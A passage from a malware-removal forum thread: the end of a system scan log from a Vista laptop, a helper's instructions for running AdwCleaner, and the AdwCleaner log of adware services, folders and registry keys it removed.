HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRConsumerService => ""="Service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-10-05 21:16 - 2015-11-14 11:49 - 00000030 ____A C:\Windows\system32\Drivers\etc\hosts


0.0.0.1    mssplus.mcafee.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\TOSHIBA-1.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 1) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [{EFE7CF45-1DAA-444A-9D68-63305F72B7B9}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PowerCinema.exe
FirewallRules: [{80374A2A-F190-4E76-B229-C33B434E33CC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMService.exe
FirewallRules: [{1B9C4756-D936-4A65-8F71-23B96B9920E7}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMP\CLBrowserEngine.exe
FirewallRules: [{A249412C-65ED-478F-A265-730F2670C0CB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMS\CLMSService.exe
FirewallRules: [{B7258A50-52F6-4718-AA9D-F64826CF7940}] => (Allow) LPort=80
FirewallRules: [{783ED446-2EB5-4D16-AA1E-E2891F07EE59}] => (Allow) LPort=80
FirewallRules: [{70403FF4-1D67-4D9B-B897-BA6F806EACA6}] => (Allow) LPort=80
FirewallRules: [{D2221019-1105-4A94-89C3-3937E8375ED2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{2C84BC51-F1B7-4BAB-ADBF-0543D8DF3E29}] => (Allow) LPort=2869
FirewallRules: [{D84264C9-3FEF-42B5-8D9F-11A47526CF13}] => (Allow) LPort=1900
FirewallRules: [{789E738D-DA66-4A05-B263-F7D8AFE251B2}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{9395CA26-0EC4-458B-ACD7-E1A49CC22B00}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{B7B911B3-E1A8-4E65-AFA0-AFCF782744C5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3F71D384-650E-4A4C-B0BE-0791DBAF9E52}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E8190506-4194-426F-9C00-B06D1C8072CC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{FF7A96AF-877F-41DF-B6A7-A5490ECE3775}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Restore Points =========================

06-09-2015 10:16:38 Windows Update
09-09-2015 11:00:57 Windows Update
10-09-2015 18:07:18 Windows Update
15-09-2015 07:55:18 Windows Update
18-09-2015 17:16:42 Windows Update
22-09-2015 14:11:34 Windows Update
26-09-2015 09:52:55 Windows Update
30-09-2015 10:34:26 Windows Update
03-10-2015 14:53:55 Windows Update
07-10-2015 17:52:14 Windows Update
11-10-2015 19:12:09 Windows Update
14-10-2015 19:51:23 Windows Update
15-10-2015 09:28:46 Windows Update
19-10-2015 11:40:48 Windows Update
22-10-2015 17:02:18 Windows Update
29-10-2015 19:01:20 Windows Update
03-11-2015 10:52:06 Windows Update
08-11-2015 11:52:57 Windows Update
12-11-2015 20:50:58 Windows Update
12-11-2015 21:46:25 Windows Update
16-11-2015 15:08:37 Windows Update
20-11-2015 19:26:46 Windows Update
27-11-2015 19:04:56 Windows Update
01-12-2015 12:15:00 Windows Update
04-12-2015 15:03:04 Windows Update
11-12-2015 12:52:52 Windows Update
14-12-2015 12:24:39 Windows Update
17-12-2015 18:42:37 Windows Update
26-12-2015 11:41:26 Windows Update
29-12-2015 21:04:35 Windows Update
03-01-2016 21:07:54 Windows Update
08-01-2016 18:16:31 Windows Update
16-01-2016 08:03:26 Windows Update
17-01-2016 11:42:08 Windows Update
21-01-2016 12:58:31 Windows Update
23-01-2016 18:29:26 Removed Ask Toolbar.
23-01-2016 18:35:35 Removed SlimCleaner Plus

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/26/2016 02:58:19 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/24/2016 02:45:42 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/24/2016 02:39:15 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/23/2016 07:44:06 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY)
Description: 0x80072af9

Error: (01/23/2016 07:41:05 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY)
Description: 0x80072af9

Error: (01/23/2016 07:37:59 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/23/2016 07:36:49 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY)
Description: 0x80072af9

Error: (01/23/2016 06:31:13 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY)
Description: 0x80072af9

Error: (01/23/2016 06:28:04 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY)
Description: 0x80072af9

Error: (01/23/2016 06:24:43 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============
Error: (01/24/2016 03:48:50 AM) (Source: ssidrv) (EventID: 26) (User: )
Description: Failed to set monitor event rule.

Error: (01/24/2016 03:47:30 AM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: 30000Netman

Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 115.31.0.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY59

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\SYSTEM

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/24/2016 02:37:27 AM) (Source: ssidrv) (EventID: 26) (User: )
Description: Failed to set monitor event rule.

Error: (01/23/2016 07:48:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 115.31.0.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/23/2016 07:48:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/23/2016 07:48:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608


CodeIntegrity:
===================================
  Date: 2016-01-26 03:07:09.097
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:07:08.847
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:07:08.629
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:07:08.395
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:07:08.005
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:07:07.771
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:07:07.521
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:07:07.287
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:06:33.544
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:06:33.326
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel® Core2 Duo CPU P7350 @ 2.00GHz
Percentage of memory in use: 39%
Total physical RAM: 4093.04 MB
Available physical RAM: 2493.93 MB
Total Virtual: 8361.36 MB
Available Virtual: 6564.87 MB

==================== Drives ================================

Drive c: (TI100343V0F) (Fixed) (Total:454.05 GB) (Free:335.04 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive e: (FCCJ TROY) (Removable) (Total:0.99 GB) (Free:0.98 GB) FAT

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 008CB0AA)
Partition 1: (Not Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Active) - (Size=454.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=10.2 GB) - (Type=17)

========================================================
Disk: 1 (Size: 1010 MB) (Disk ID: 00661E17)
Partition 1: (Active) - (Size=1010 MB) - (Type=06)

==================== End of Addition.txt ============================

Link to post
Share on other sites

adwcleaner_new.png Fix with AdwCleaner

Please download AdwCleaner by Xplode and save the file to your Desktop.

  • Right-click on adwcleaner_new.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Accept the Terms of use.
  • Wait until the database is updated.
  • Click Scan.
  • When finished, please click Cleaning.
  • Your PC should reboot now.
  • After reboot, logfile will be opened. Copy its content into your next reply.
Note: Reports will be saved in your system partition, usually at C:\Adwcleaner
Link to post
Share on other sites

# AdwCleaner v5.031 - Logfile created 27/01/2016 at 03:13:36
# Updated 25/01/2016 by Xplode
# Database : 2016-01-25.3 [Local]
# Operating system : Windows Vista Home Premium Service Pack 2 (x64)
# Username : Barbara - BARBARA-PC
# Running from : C:\Users\Barbara\Desktop\AdwCleaner.exe
# Option : Cleaning
# Support : http://toolslib.net/forum

***** [ Services ] *****

[-] Service Deleted : CouponPrinterService
[-] Service Deleted : swdumon

***** [ Folders ] *****

[#] Folder Deleted : C:\Program Files\PC Optimizer Pro
[#] Folder Deleted : C:\Program Files\WebBar
[#] Folder Deleted : C:\Program Files (x86)\Coupons
[#] Folder Deleted : C:\Program Files (x86)\driverupdate
[#] Folder Deleted : C:\Program Files (x86)\OneSystemCare
[#] Folder Deleted : C:\Program Files (x86)\Yahoo!\Companion
[#] Folder Deleted : C:\ProgramData\CrimeWatch
[#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
[#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\driverupdate
[#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
[#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Optimizer Pro
[#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UpdateAdmin
[#] Folder Deleted : C:\Users\Barbara\AppData\Local\FinanceAlert
[#] Folder Deleted : C:\Users\Barbara\AppData\Local\StormWatch
[#] Folder Deleted : C:\Users\Barbara\AppData\Local\WebBar
[#] Folder Deleted : C:\Users\Barbara\AppData\LocalLow\Yahoo! Companion
[#] Folder Deleted : C:\Users\Barbara\AppData\LocalLow\Yahoo!\Companion
[#] Folder Deleted : C:\Users\Barbara\AppData\Roaming\Yahoo!\Companion
[#] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Local\iac

***** [ Files ] *****

[-] File Deleted : C:\Windows\SysNative\drivers\swdumon.sys
[-] File Deleted : C:\Windows\SysWOW64\pmls.dll

***** [ DLLs ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****

[-] Key Deleted : HKCU\Software\Classes\CLSID\{554EBE31-AEC1-4E34-BCE3-606467760D88}
[-] Key Deleted : HKCU\Software\Classes\CLSID\{0FEB2313-F89B-4AC6-8153-84025604A06A}
[-] Key Deleted : HKCU\Software\Classes\CLSID\{F8534A9F-4F29-4FDC-9CD9-023ACF0EF9B9}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A2970C7C-8392-4E6F-8B51-B763CF38E13C}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{95B92D92-8B7D-4A19-A3F1-43113B4DBCAF}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B8445FED-900C-4137-AD15-DDD2F6306B62}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{02F878DF-E2BE-4B85-8CB4-A0D2D4E2ED7F}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{2AF343DD-3102-4F9D-AC95-DCA4C95382C7}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3137BC14-D8D7-4B67-8FFA-2E0B2E9D541B}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4CA2AC92-971B-47B1-ACB6-357B552155AC}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{52C5395B-1FCD-47FA-A834-FD830701C2D5}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{5D3DCC39-9233-4330-94E9-DA92BE49CA1A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{615FACDF-DADB-440D-AC91-8AAB0AE9E3AD}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{762D463B-C45A-456D-A80D-8689C297C91E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{7A6BE473-7960-44D0-BD54-D23DA76353DF}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{803F550E-BAAE-42BB-8917-64BA0006AB17}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{8D5BC51D-C9D3-43B9-B728-B30677B7C7E8}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{991C9D8D-A789-4DB9-BDFC-5F33398B04BF}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A5ACC874-D943-483F-A2D1-14598D51F872}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B0474212-0D9D-4361-90B3-B89D1A44275D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{BFDE183A-C6FE-41D2-80F9-586C29210AC2}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{D83C83BF-3EDD-4410-ADAB-5295116DD8C7}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{DD260902-9420-4055-A956-9152EB4F3E6A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EB1F9F3C-5526-4DAE-BD4B-3EAA7715DA9F}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{F1912128-469A-4138-AA26-9699C15BB13E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{F68DC16C-9C2B-455B-8853-7E4D34BAA3F4}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{FBA8498F-B3A0-4942-A2BF-E0CB7BC7E000}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0510789C-5E5D-4FA3-A3EF-2D56FDE5090A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{934063FB-A81D-4849-B02C-478446DF3219}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B34A6A15-1F6F-4A19-A9DD-8B44C874A20B}
[!] Key Not Deleted : HKLM\SOFTWARE\Classes\Interface\{B8445FED-900C-4137-AD15-DDD2F6306B62}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{5297E905-1DFB-4A9C-9871-A4F95FD58945}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{34979CB5-728D-4727-81BF-01850A3BB89B}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{A3866408-A46D-4421-816F-F34D7247A046}
[-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{83FF80F4-8C74-4B80-B5BA-C8DDD434E5C4}
[-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{D4027C7F-154A-4066-A1AD-4243D8127440}
[-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{83FF80F4-8C74-4B80-B5BA-C8DDD434E5C4}
[-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{D4027C7F-154A-4066-A1AD-4243D8127440}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{2FF49ED5-A3EF-410B-918E-97DECEB5996D}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{89CC5A31-B592-4BB3-82F5-BD8ACA3E0BF0}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4E7F49ED-8C94-4AAA-A407-3010D099B11A}
[!] Key Not Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4e7f49ed-8c94-4aaa-a407-3010d099b11a}
[!] Key Not Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{89cc5a31-b592-4bb3-82f5-bd8aca3e0bf0}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9dffaa5f-44c6-4ff2-80ee-76368d0a2e75}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e017ef59-8c1e-4124-bf6d-6d647d01e352}
[-] Value Deleted : HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{D4027C7F-154A-4066-A1AD-4243D8127440}]
[-] Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{D4027C7F-154A-4066-A1AD-4243D8127440}]
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{A2970C7C-8392-4E6F-8B51-B763CF38E13C}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{95B92D92-8B7D-4A19-A3F1-43113B4DBCAF}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B8445FED-900C-4137-AD15-DDD2F6306B62}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{02F878DF-E2BE-4B85-8CB4-A0D2D4E2ED7F}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{2AF343DD-3102-4F9D-AC95-DCA4C95382C7}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{3137BC14-D8D7-4B67-8FFA-2E0B2E9D541B}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4CA2AC92-971B-47B1-ACB6-357B552155AC}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{52C5395B-1FCD-47FA-A834-FD830701C2D5}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{5D3DCC39-9233-4330-94E9-DA92BE49CA1A}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{615FACDF-DADB-440D-AC91-8AAB0AE9E3AD}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{762D463B-C45A-456D-A80D-8689C297C91E}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{7A6BE473-7960-44D0-BD54-D23DA76353DF}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{803F550E-BAAE-42BB-8917-64BA0006AB17}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{8D5BC51D-C9D3-43B9-B728-B30677B7C7E8}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{991C9D8D-A789-4DB9-BDFC-5F33398B04BF}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{A5ACC874-D943-483F-A2D1-14598D51F872}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B0474212-0D9D-4361-90B3-B89D1A44275D}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{BFDE183A-C6FE-41D2-80F9-586C29210AC2}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{D83C83BF-3EDD-4410-ADAB-5295116DD8C7}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{DD260902-9420-4055-A956-9152EB4F3E6A}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EB1F9F3C-5526-4DAE-BD4B-3EAA7715DA9F}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{F1912128-469A-4138-AA26-9699C15BB13E}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{F68DC16C-9C2B-455B-8853-7E4D34BAA3F4}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{FBA8498F-B3A0-4942-A2BF-E0CB7BC7E000}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{0510789C-5E5D-4FA3-A3EF-2D56FDE5090A}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{934063FB-A81D-4849-B02C-478446DF3219}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B34A6A15-1F6F-4A19-A9DD-8B44C874A20B}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B8445FED-900C-4137-AD15-DDD2F6306B62}
[-] Key Deleted : HKCU\Software\BEFRUGAL
[-] Key Deleted : HKCU\Software\DownloadAdmin
[-] Key Deleted : HKCU\Software\SlimWare Utilities Inc
[-] Key Deleted : HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
[-] Key Deleted : HKLM\SOFTWARE\SlimWare Utilities Inc
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Coupon Printer for Windows5.0.1.6
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{0BCE8B0A-1E76-44E5-9909-3CF804D92E4D}_is1
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{79A765E1-C399-405B-85AF-466F52E918B0}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{eeb86aef-4a5d-4b75-9d74-f16d438fc286}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Coupon Printer for Windows5.0.1.6
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\CrimeWatch
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\OneSystemCare
[-] Key Deleted : HKU\.DEFAULT\Software\AppDataLow\Software\AskToolbar
[-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes\{9F6F6BFF-5270-44E3-8D40-0F2D89A64F42}
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\driverupdate.net
